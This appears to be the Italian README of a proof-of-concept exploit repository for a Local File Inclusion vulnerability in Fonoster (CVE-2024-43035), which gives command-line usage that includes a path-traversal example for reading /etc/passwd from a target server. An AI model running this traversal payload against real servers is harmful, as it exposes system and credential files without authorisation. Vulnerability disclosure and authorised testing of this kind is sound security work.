
Exploit proof-of-concept per la vulnerabilità LFI di Fonoster (CVE-2024-43035)
Questo repository contiene uno script di prova di concetto (PoC) che dimostra una vulnerabilità di Local File Inclusion in Fonoster. Questo strumento è destinato esclusivamente a scopi educativi e di test autorizzati.
Per recuperare un file locale dal server:
python3 fonoster_lfi_poc.py --url <fonoster_server_url> --path <file_path_to_retrieve>
Esempio:
python3 fonoster_lfi_poc.py --url http://example.com --path "../../../etc/passwd"
z